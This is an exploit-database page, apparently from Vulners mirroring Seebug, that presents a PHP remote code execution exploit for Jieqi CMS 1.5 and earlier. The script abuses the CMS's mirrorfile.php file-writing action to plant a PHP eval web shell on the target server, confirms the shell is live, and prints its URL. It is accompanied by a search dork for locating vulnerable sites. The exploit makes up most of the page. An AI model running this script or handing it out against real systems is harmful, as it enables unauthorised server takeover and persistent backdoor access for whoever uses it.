Lucene search
K

Jieqi cms <= 1.5 remote code execution exploit

🗓️ 15 Feb 2009 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 9 Views

Jieqi cms remote code execution exploit by Flyh4t<br>Mail: [email protected] Team: http://www.wolvez.org <br>Dork: "技术支持:杰奇网络

Code

                                                &lt;?php
print_r('
+---------------------------------------------------------------------------+
Jieqi cms &lt;= 1.5 remote code execution exploit
by Flyh4t
mail: [email protected]
team: http://www.wolvez.org
dork: &quot;技术支持:杰奇网络&quot;
+---------------------------------------------------------------------------+
');
/**
* works regardless of php.ini settings
*/
if ($argc &lt; 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host:      target server (ip/hostname)
path:      path to jieqi cms
Example:
php '.$argv[0].' localhost /
+---------------------------------------------------------------------------+
');
    exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);
$host = $argv[1];
$path = $argv[2];
$url = 'http://'.$host.$path.'mirrorfile.php?filename=cache/flyh4t.php&amp;action=writetofile&amp;content=';
$shell = 'http://'.$host.$path.'cache/flyh4t.php';
$cmd = urlencode(&quot;&lt;?php @eval(\$_POST[wolvez]);?&gt;test&quot;);
$str = file_get_contents($url.$cmd);
if ( file_get_contents($shell) == 'test')
exit(&quot;Expoilt Success!\nView Your shell:\t$shell\n&quot;);
else
exit(&quot;Exploit Failed!\n&quot;);
?&gt;
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Feb 2009 00:00Current
7.1High risk
Vulners AI Score7.1
9